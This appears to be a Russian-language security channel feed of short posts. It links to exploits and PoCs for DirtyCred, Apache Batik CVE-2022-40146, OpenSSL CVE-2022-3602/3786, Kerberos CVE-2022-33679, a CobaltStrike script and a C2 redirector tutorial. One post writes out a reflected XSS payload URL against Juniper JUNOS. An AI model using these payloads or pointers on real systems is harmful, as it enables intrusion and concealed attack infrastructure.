DirtyCred
Концепция эксплуатации ядра linux, которая заменяет непривилегированные учетные данные ядра на привилегированные для повышения привилегий. Вместо того, чтобы перезаписывать какие-либо важные поля данных в куче ядра, DirtyCred злоупотребляет механизмом повторного использования памяти кучи для получения привилегий.
DirtyCred - github
DirtyCred - Escalating Privilege in Linux Kernel PDF
DirtyCred - BlackHat USA 2022 presentation

#linux

halloween - празднуем\запускаем ? )))
docker run -it --rm docker/doodle:halloween2019

#fun

Все бегом читать !
Тут vx-underground выкатил BLACK MASS.pdf

CVE-2022-40146 exploit
Дыры в элементах управления безопасностью Apache Batik по умолчанию — SSRF и RCE через удаленную загрузку классов
What da fuck is this ? Read

#apache #rce #java

loading.......................................
Осталось 17 дней ...................

Следим за руками 0_o
репозиторий содержит оперативную информацию о недавно объявленной уязвимости в OpenSSL 3
*
Уязвимость присутствует в продуктах, использующих OpenSSL 3.0.0-3.0.6. Продукты, использующие OpenSSL 1.0.2 или 1.1.1, не затронуты.
repository

#openssl

CVE−2022-3602
Для исследователей
punycode ииии OpenSSL
POC

Такие дела

cve-2022-3602
cve-2022-3786 - openssl-poc
Download POC

#openssl #poc

Вредный RC4 и 1day exploit
CVE-2022-33679
Как это было - почитать тут
Забрать exploit тут

#windows #exploit #kerberos

Juniper как всегда
А CVE-2022-22242 так вообще POC

https://JUNOS_IP/error.php?SERVER_NAME=<noscript>alert(0)</noscript>

press F5 ))

Может кому пригодится

CS_Uploads_Tracker
Aggressor noscript для CobaltStrike для помощи в отслеживании файлов, которые были загружены в целевые системы
download

А где vx-underground ?

#malware

Red Team Tutorial: Design and setup of C2 traffic redirectors
*
Как создать редиректор HTTPS с помощью базовых инструментов — nginx, минималистичный VPS, бесплатный DNS и сервисы сертификатов PKI, как скрыть истинное местоположение сервера C2 и вот это вот все.
REaD

#redteam #c2